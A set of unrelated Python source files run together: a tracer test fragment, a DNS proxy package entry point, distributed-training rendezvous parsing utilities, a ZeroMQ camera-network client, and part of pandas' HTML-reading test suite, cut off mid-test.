@seeker.tracer(output=string_io, prefix=_prefix, only_watch=False)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix=_prefix),
VariableEntry("A", value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry("def add():", prefix=_prefix),
LineEntry("a = A(19)", prefix=_prefix),
VariableEntry(
"a",
value_regex=r"<.*\.A (?:object|instance) at 0x[0-9a-z]+>",
prefix=_prefix,
),
LineEntry("b = A(22)", prefix=_prefix),
VariableEntry(
"b",
value_regex=r"<.*\.A (?:object|instance) at 0x[0-9a-z]+>",
prefix=_prefix,
),
LineEntry("res = a.a + b.a", prefix=_prefix),
VariableEntry("res", value="41", prefix=_prefix),
LineEntry("return res", prefix=_prefix),
ReturnEntry("return res", prefix=_prefix),
ReturnValueEntry("41", prefix=_prefix),
ElapsedTimeEntry(prefix=_prefix),
),
)
@pytest.mark.skip(reason="No normalization")
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@seeker.tracer(output=string_io, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
def test_exception():
string_io = io.StringIO()
@seeker.tracer(output=string_io, only_watch=False)
def f():
x = 8
raise MemoryError
with pytest.raises(MemoryError):
f()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
ExceptionEntry(),
ExceptionValueEntry("MemoryError"),
CallEndedByExceptionEntry(),
ElapsedTimeEntry(),
),
)
def test_exception_on_entry():
@seeker.tracer()
def f(x):
pass
with pytest.raises(TypeError):
f()
|
__init__.py
|
"""DNS proxy package."""
from dnsproxy.website import WebServer
from dnsproxy.server import Server
from dnsproxy.config import Config
from threading import Thread
from sys import argv
import logging
logger = logging.getLogger('dnsproxy')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)-15s %(levelname)-8s %(name)s.%(funcName)s @ %(threadName)s : %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.DEBUG)
consoleHandler.setFormatter(formatter)
hdlr = logging.FileHandler('dnsapp.log')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.addHandler(consoleHandler)
class App(object):
"""DNS proxy runnable app."""
def __init__(self, host = None):
self.logger = logging.getLogger('dnsproxy.App')
self.config = Config().from_file()
self.server = Server(self.config, host)
self.webserver = WebServer(self.config, self.server)
self.website_thread = Thread(name='WebServer-thread', target = self.run_website_blocking)
self.logger.info('created')
def run(self):
"""Starts DNS proxy server and config website server according to provided configuration.
"""
self.logger.debug('preparing to run')
self.server.start()
#self.website_thread.start()
self.logger.info('server threads started')
self.run_website_blocking()
self.server.stop()
def run_website_blocking(self):
self.webserver.app.run(host = '127.0.0.1', port = self.config.http_access_port)
if __name__ == '__main__':
if len(argv) > 1:
App(argv[1]).run()
else:
App().run()
|
utils.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import ipaddress
import re
import socket
from datetime import timedelta
from threading import Event, Thread
from typing import Any, Callable, Dict, Optional, Tuple
def _parse_rendezvous_config(config_str: str) -> Dict[str, str]:
"""Extracts key-value pairs from a rendezvous configuration string.
Args:
config_str:
A string in format <key1>=<value1>,...,<keyN>=<valueN>.
"""
config: Dict[str, str] = {}
config_str = config_str.strip()
if not config_str:
return config
key_values = config_str.split(",")
for kv in key_values:
key, *values = kv.split("=", 1)
key = key.strip()
if not key:
raise ValueError(
"The rendezvous configuration string must be in format "
"<key1>=<value1>,...,<keyN>=<valueN>."
)
value: Optional[str]
if values:
value = values[0].strip()
else:
value = None
if not value:
raise ValueError(
f"The rendezvous configuration option '{key}' must have a value specified."
)
config[key] = value
return config
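# Illustrative sketch (key names are hypothetical, not part of the original module):
# the parser accepts a comma-separated key=value string and returns a dict of strings.
#
#   _parse_rendezvous_config("join_timeout=600,last_call_timeout=30")
#   # -> {"join_timeout": "600", "last_call_timeout": "30"}
#
# An empty value such as "timeout=" raises ValueError, as does a missing key.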
def _try_parse_port(port_str: str) -> Optional[int]:
"""Tries to extract the port number from ``port_str``."""
if port_str and re.match(r"^[0-9]{1,5}$", port_str):
return int(port_str)
return None
def parse_rendezvous_endpoint(endpoint: Optional[str], default_port: int) -> Tuple[str, int]:
"""Extracts the hostname and the port number from a rendezvous endpoint.
Args:
endpoint:
A string in format <hostname>[:<port>].
default_port:
The port number to use if the endpoint does not include one.
Returns:
A tuple of hostname and port number.
"""
if endpoint is not None:
endpoint = endpoint.strip()
if not endpoint:
return ("localhost", default_port)
# An endpoint that starts and ends with brackets represents an IPv6 address.
if endpoint[0] == "[" and endpoint[-1] == "]":
host, *rest = endpoint, *[]
else:
host, *rest = endpoint.rsplit(":", 1)
# Sanitize the IPv6 address.
if len(host) > 1 and host[0] == "[" and host[-1] == "]":
host = host[1:-1]
if len(rest) == 1:
port = _try_parse_port(rest[0])
if port is None or port >= 2 ** 16:
raise ValueError(
f"The port number of the rendezvous endpoint '{endpoint}' must be an integer "
"between 0 and 65536."
)
else:
port = default_port
if not re.match(r"^[\w\.:-]+$", host):
raise ValueError(
f"The hostname of the rendezvous endpoint '{endpoint}' must be a dot-separated list of "
"labels, an IPv4 address, or an IPv6 address."
)
return host, port
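# Illustrative sketch (host names and ports are made up): a few input/output pairs
# implied by the parsing logic above.
#
#   parse_rendezvous_endpoint(None, 29400)           # -> ("localhost", 29400)
#   parse_rendezvous_endpoint("node1:29500", 29400)  # -> ("node1", 29500)
#   parse_rendezvous_endpoint("[::1]:29500", 29400)  # -> ("::1", 29500)
#
# A non-numeric or out-of-range port raises ValueError.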
def _matches_machine_hostname(host: str) -> bool:
"""Indicates whether ``host`` matches the hostname of this machine.
This function compares ``host`` to the hostname as well as to the IP
addresses of this machine. Note that it may return a false negative if this
machine has CNAME records beyond its FQDN or IP addresses assigned to
secondary NICs.
"""
if host == "localhost":
return True
try:
addr = ipaddress.ip_address(host)
except ValueError:
addr = None
if addr and addr.is_loopback:
return True
this_host = socket.gethostname()
if host == this_host:
return True
addr_list = socket.getaddrinfo(
this_host, None, proto=socket.IPPROTO_TCP, flags=socket.AI_CANONNAME
)
for addr_info in addr_list:
# If we have an FQDN in the addr_info, compare it to `host`.
if addr_info[3] and addr_info[3] == host:
return True
# Otherwise if `host` represents an IP address, compare it to our IP
# address.
if addr and addr_info[4][0] == str(addr):
return True
return False
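# Illustrative behavior sketch: given the checks above, loopback addresses and this
# machine's own hostname always match.
#
#   _matches_machine_hostname("localhost")             # True
#   _matches_machine_hostname("127.0.0.1")             # True (loopback address)
#   _matches_machine_hostname(socket.gethostname())    # True (exact hostname match)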
class _PeriodicTimer:
"""Represents a timer that periodically runs a specified function.
Args:
interval:
The interval, in seconds, between each run.
function:
The function to run.
"""
# The state of the timer is held in a separate context object to avoid a
# reference cycle between the timer and the background thread.
class _Context:
interval: float
function: Callable[..., None]
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
stop_event: Event
_thread: Optional[Thread]
# The context that is shared between the timer and the background thread.
_ctx: _Context
def __init__(
self,
interval: timedelta,
function: Callable[..., None],
*args: Any,
**kwargs: Any,
) -> None:
self._ctx = self._Context()
self._ctx.interval = interval.total_seconds()
self._ctx.function = function # type: ignore[assignment]
self._ctx.args = args or ()
self._ctx.kwargs = kwargs or {}
self._ctx.stop_event = Event()
self._thread = None
def __del__(self) -> None:
self.cancel()
def start(self) -> None:
"""Start the timer."""
if self._thread:
raise RuntimeError("The timer has already started.")
self._thread = Thread(
target=self._run, name="PeriodicTimer", args=(self._ctx,), daemon=True
)
self._thread.start()
def cancel(self) -> None:
"""Stop the timer at the next opportunity."""
if not self._thread:
return
self._ctx.stop_event.set()
self._thread.join()
@staticmethod
def _run(ctx) -> None:
while not ctx.stop_event.wait(ctx.interval):
ctx.function(*ctx.args, **ctx.kwargs)
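# Illustrative usage sketch (not part of the original module): run a heartbeat
# callback every few seconds until the timer is cancelled.
#
#   timer = _PeriodicTimer(timedelta(seconds=5), print, "still alive")
#   timer.start()
#   ...
#   timer.cancel()  # sets the stop event and joins the background thread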
|
client.py
|
##
## Copyright (C) 2017, Amit Aides, all rights reserved.
##
## This file is part of Camera Network
## (see https://bitbucket.org/amitibo/cameranetwork_git).
##
## Redistribution and use in source and binary forms, with or without modification,
## are permitted provided that the following conditions are met:
##
## 1) The software is provided under the terms of this license strictly for
## academic, non-commercial, not-for-profit purposes.
## 2) Redistributions of source code must retain the above copyright notice, this
## list of conditions (license) and the following disclaimer.
## 3) Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions (license) and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## 4) The name of the author may not be used to endorse or promote products derived
## from this software without specific prior written permission.
## 5) As this software depends on other libraries, the user must adhere to and keep
## in place any licensing terms of those libraries.
## 6) Any publications arising from the use of this software, including but not
## limited to academic journal and conference publications, technical reports and
## manuals, must cite the following works:
## Dmitry Veikherman, Amit Aides, Yoav Y. Schechner and Aviad Levis, "Clouds in The Cloud" Proc. ACCV, pp. 659-674 (2014).
##
## THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
## WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
## MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
## EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
## INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
## BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
## OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.##
from __future__ import division
from concurrent import futures
import cPickle
from functools import partial
import logging
import numpy as np
from random import randint
import StringIO
from threading import Thread
import time
import traceback
import zmq
from zmq.eventloop import ioloop, zmqstream
import CameraNetwork.global_settings as gs
from CameraNetwork.mdp import *
from CameraNetwork.mdp import MDP
from CameraNetwork.server import Server
from CameraNetwork.utils import extractImgArray
__all__ = ['Client', 'CLIclient']
class Client(MDPClient):
"""
A base class for communication with servers.
"""
def __init__(self, proxy_params, mmi_period=1000):
self.ctx = zmq.Context()
self.proxy_params = proxy_params
self.mmi_period = mmi_period
#
# Setup the mdp client
#
super(Client, self).__init__(
context=self.ctx,
endpoint="tcp://{ip}:{client_port}".format(**proxy_params)
)
self._servers_set = set()
def __del__(self):
self.loop.stop()
self.shutdown()
self.ctx.term()
def start(self, delay_start=0):
"""Start the client loop."""
#
# Create a new instance of the ioloop.
# This is important, for example, when running from an IPython notebook (which
# itself runs its own ioloop).
#
ioloop.IOLoop.clear_current()
ioloop.IOLoop.clear_instance() # or del IOLoop._instance in tornado < 3.3
#
# Set the (Tornado) loop
#
self.loop = ioloop.IOLoop().instance()
#
# Start the MDP client.
#
super(Client, self).start()
#
# Start the ioloop.
#
time.sleep(delay_start)
ioloop.PeriodicCallback(
partial(self.send_mmi, service=MDP.MMI_SERVICES, msg=[]), self.mmi_period, self.loop
).start()
self.loop.start()
def send(self, server_address, cmd, msg_extra=MDP.STANDARD, args=(), kwds={}):
"""Send a message to a specific server"""
msg = (cmd, args, kwds)
msg_out = cPickle.dumps(msg)
self.request(
service=server_address,
msg_extra=msg_extra,
msg=msg_out
)
def handle_new_server(self, server):
"""Callback on connection of a new server. Derived classes should override this method."""
pass
def handle_server_failure(self, server):
"""Callback on disconnection of a server. Derived classes should override this method."""
pass
def handle_receive(self, msg_extra, service, status, cmd, args, kwds):
"""Callback to handle receive.
This is called only if there are no other callbacks to handle the message.
Derived classes should override this method."""
raise Warning('Unattended message: ', str((status, cmd, args, kwds)))
def on_message(self, msg):
"""Public method called when a message arrived."""
# 1st part is msg type
msg_extra = ord(msg.pop(0))
# 2nd part is empty
msg.pop(0)
# 3rd part is protocol version
# TODO: version check
proto = msg.pop(0)
# 4th part is service type
service = msg.pop(0)
if service.startswith(b'mmi.'):
self.on_mmi(service, msg)
return
status, cmd, args, kwds = cPickle.loads(msg[0])
#
# Call the corresponding cmd callback.
#
self.handle_receive(msg_extra, service, status, cmd, args, kwds)
def on_timeout(self):
"""Public method called when a timeout occurred.
.. note:: Does nothing. Should be overloaded!
"""
pass
def send_mmi(self, service, msg=[]):
"""Check the list of available servers"""
self.request(service=service, msg=msg)
def on_mmi(self, service, msg):
"""handle mmi requests"""
if service == MDP.MMI_SERVICES:
self.calculate_server_changes(msg)
elif service == MDP.MMI_TUNNELS:
self.tunnels_cb(cPickle.loads(msg[0]))
else:
raise Warning('Unknown mmi msg: %s, %s' % (service, str(msg)))
return
def tunnels_cb(self, tunnels_dict):
raise NotImplementedError("'tunnels_cb' should be implemented by a subclass.")
def calculate_server_changes(self, updated_servers_list):
"""
Compare the updated list of alive servers (collected by the periodic MMI ping)
against the known server set, and fire callbacks for new and failed servers.
"""
#
# Check the previous responses. This is done here as we expect that we
# received all responses.
#
updated_servers_list = set(updated_servers_list)
good_servers = self._servers_set.intersection(updated_servers_list)
server_failures = self._servers_set.difference(good_servers)
new_servers = updated_servers_list.difference(good_servers)
map(self._handle_new_server, new_servers)
map(self._handle_server_failure, server_failures)
def _handle_new_server(self, server):
"""Handling the connection of a new server"""
logging.debug("yay, got new server {}!".format(server))
#
# Update server list
#
self._servers_set.add(server)
#
# Call callback
#
self.handle_new_server(server)
def handle_new_server(self, server):
"""Callback on connection of a new server. Derived classes should override this method."""
pass
def _handle_server_failure(self, server):
"""Handling the disconnection of a server"""
logging.debug("Server {} failed :(".format(server))
#
# Update server list
#
self.handle_server_failure(server)
#
# Call callback
#
self._servers_set.remove(server)
def handle_server_failure(self, server):
"""Callback on disconnection of a server. Derived classes should override this method."""
pass
@property
def servers(self):
return sorted(list(self._servers_set))
class ServerProxy(object):
"""Helper class to 'automatically implement cmd api for the CLI client.
"""
def __init__(self, client, servers_id):
self._client = client
self._servers_id = servers_id
def __getattr__(self, name):
"""Dynamically create messages."""
if not hasattr(Server, 'handle_{}'.format(name)):
raise AttributeError("Unknown server command: {}".format(name))
#
# Create sendmessage method.
#
def autocmd(*args, **kwds):
#
# Send message
#
results = \
self._client.send_message(
servers_id=self._servers_id,
cmd=name,
args=args,
kwds=kwds
)
return results
autocmd.__doc__ = getattr(Server, 'handle_{}'.format(name)).__doc__
return autocmd
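# Illustrative sketch (server id and command name are hypothetical): attribute access
# on a ServerProxy is translated into a send_message call on the CLI client, e.g.
#
#   proxy = cli_client["cam01"]    # ServerProxy(cli_client, ["cam01"]) via __getitem__ below
#   proxy.sunshader(angle=90)      # -> cli_client.send_message(["cam01"], cmd="sunshader", kwds={"angle": 90})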
class CLIclient(object):
"""'Command Line' client.
Useful for interfacing with cameras from Ipython or from scripts.
"""
def __init__(self, timeout=30):
self.futures = {}
self.servers_list = []
self.timeout = timeout
def __getitem__(self, servers_id):
if type(servers_id) not in (tuple, list):
servers_id = [servers_id]
unknown_servers = set(servers_id).difference(set(self.client_instance.servers))
if len(unknown_servers) > 0:
raise IndexError(
'Unknown servers: {}. List of known servers: {}.'.format(
unknown_servers, self.client_instance.servers
)
)
return ServerProxy(self, servers_id)
def __getattr__(self, name):
if not hasattr(Server, 'handle_{}'.format(name)):
raise AttributeError("Unknown server command: {}".format(name))
def proxy_func(servers_id, *args, **kwds):
return getattr(self[servers_id], name)(*args, **kwds)
proxy_func.__name__ = name
proxy_func.__doc__ = getattr(Server, 'handle_{}'.format(name)).__doc__
return proxy_func
def start(self, proxy_params):
client_instance = Client(proxy_params)
#
# Bind callbacks
#
client_instance.handle_new_server = self.add_server
client_instance.handle_server_failure = self.remove_server
client_instance.handle_receive = self.receive_message
client_instance.tunnels_cb = self.tunnels_cb
self.client_instance = client_instance
#
        # Start the client thread
#
thread = Thread(target=self.client_instance.start, args=(0,))
thread.daemon = True
thread.start()
def send_message(self, servers_id, cmd, args=(), kwds={}):
"""Send a message to (possibly) multiple servers.
The same message is sent to all servers.
"""
loop = ioloop.IOLoop.instance()
if type(servers_id) not in (tuple, list):
servers_id = [servers_id]
future_list = []
for server_id in servers_id:
future = futures.Future()
self.futures[server_id] = future
future_list.append(future)
loop.add_callback(self.client_instance.send, server_address=server_id, cmd=cmd, args=args, kwds=kwds)
results = []
for future in future_list:
results.append(future.result(timeout=self.timeout))
statuses, cmds, args_answers, kwds_answers = zip(*results)
#
# Check the reply status
#
for status, args_answer, server_id in zip(statuses, args_answers, servers_id):
            if status != gs.MSG_STATUS_OK:
raise gs.MSG_EXCEPTION_MAP[status](
"Server {} raised Exception:\n{}".format(server_id, args_answer[0])
)
return args_answers, kwds_answers
def send_mmi(self, service, msg=[], timeout=30):
future = futures.Future()
self.futures['mmi'] = future
loop = ioloop.IOLoop.instance()
loop.add_callback(
self.client_instance.send_mmi,
service=service,
msg=msg
)
return future.result(timeout=timeout)
def tunnels_cb(self, tunnels):
"""Return the tunnels data."""
self.futures['mmi'].set_result(tunnels)
def add_server(self, server_id):
logging.info('Adding the new server: {}'.format(server_id))
self.servers_list.append(server_id)
self.servers_list = sorted(self.servers_list)
def remove_server(self, server_id):
logging.info('Removing the server: {}'.format(server_id))
self.servers_list.remove(server_id)
def receive_message(self, msg_extra, server_id, status, cmd, args, kwds):
if server_id in self.futures.keys():
self.futures[server_id].set_result((status, cmd, args, kwds))
def get_array(
self,
servers_id,
exposure_us=500,
gain_db=0,
resolution=301,
frames_num=1,
color_mode=gs.COLOR_RAW,
gain_boost=False,
normalize=True
):
args_answers, kwds_answers = self.send_message(
servers_id,
cmd=gs.MSG_TYPE_ARRAY,
kwds=dict(
exposure_us=exposure_us,
gain_db=gain_db,
resolution=resolution,
frames_num=frames_num,
color_mode=color_mode,
gain_boost=gain_boost,
normalize=normalize
)
)
img_arrays, img_datas = [], []
for kwds in kwds_answers:
img_arrays.append(extractImgArray(kwds['matfile']))
img_datas.append(kwds['img_data'])
return img_arrays, img_datas
def sunshader(
self,
server_id,
angle,
):
assert 20 <= angle <= 160, \
'angle must be between 20-160, got {}'.format(angle)
self.send_message(
server_id,
cmd=gs.MSG_TYPE_SUNSHADER,
kwds=dict(
angle=angle
)
)
def query(
self,
server_id,
query_day,
force=False
):
args_answers, kwds_answers = self.send_message(
server_id,
cmd=gs.MSG_TYPE_QUERY,
kwds=dict(
query_date=query_day,
force=force
)
)
images_dfs = []
for kwds in kwds_answers:
images_dfs.append(kwds['images_df'])
return images_dfs
def seek(
self,
server_id,
seek_time,
hdr_index,
jpeg,
resolution,
correct_radiometric=True,
ignore_date_extrinsic=False
):
args_answers, kwds_answers = self.send_message(
server_id,
cmd=gs.MSG_TYPE_SEEK,
kwds=dict(
seek_time=seek_time,
hdr_index=hdr_index,
normalize=True,
jpeg=jpeg,
resolution=resolution,
correct_radiometric=correct_radiometric,
ignore_date_extrinsic=ignore_date_extrinsic
)
)
img_arrays, img_datas = [], []
for kwds in kwds_answers:
img_arrays.append(extractImgArray(kwds['matfile']))
img_datas.append(kwds['img_data'])
return img_arrays, img_datas
def main():
import CameraNetwork
from CameraNetwork.sunphotometer import findClosestImageTime
c = CameraNetwork.CLIclient()
proxy_params = CameraNetwork.retrieve_proxy_parameters(local_mode=True)
c.start(proxy_params)
qdf_102 = c.query('102', '2016-10-23')
closest_time = findClosestImageTime(qdf_102, '2016-10-23 05:13:07', hdr='2')
    img, img_data = c.seek('102', closest_time, -1, jpeg=False, resolution=301)  # jpeg=False is an assumed value; seek() requires an explicit resolution
if __name__ == '__main__':
main()
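def example_get_array():
    # Usage sketch (never called anywhere): fetch a single normalized frame
    # from one camera server. The proxy retrieval and the server id '102'
    # mirror main() above; the exposure/resolution values are only illustrative.
    import CameraNetwork
    c = CameraNetwork.CLIclient()
    proxy_params = CameraNetwork.retrieve_proxy_parameters(local_mode=True)
    c.start(proxy_params)
    img_arrays, img_datas = c.get_array(
        '102', exposure_us=500, resolution=301, frames_num=1
    )
    return img_arrays[0], img_datas[0]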
|
test_html.py
|
from __future__ import print_function
import os
import re
import threading
from functools import partial
import pytest
import numpy as np
from numpy.random import rand
from pandas import (DataFrame, MultiIndex, read_csv, Timestamp, Index,
date_range, Series)
from pandas.compat import (map, zip, StringIO, BytesIO,
is_platform_windows, PY3, reload)
from pandas.errors import ParserError
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import makeCustomDataframe as mkdf, network
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with tm.assert_raises_regex(ValueError, "minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = 'google.com'
with pytest.raises(ValueError):
read_html(url, 'google', flavor='not a* valid**++ flaver')
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
    pytest.param('bs4', marks=pytest.mark.skipif(
        not td.safe_import('bs4'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
if PY3:
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=set([1, 2]))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=set([2, 1]))
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with tm.assert_raises_regex(TypeError, 'is not a valid type '
'for skipping rows'):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert str(e) == 'No tables found'
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with tm.assert_raises_regex(ValueError, 'No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
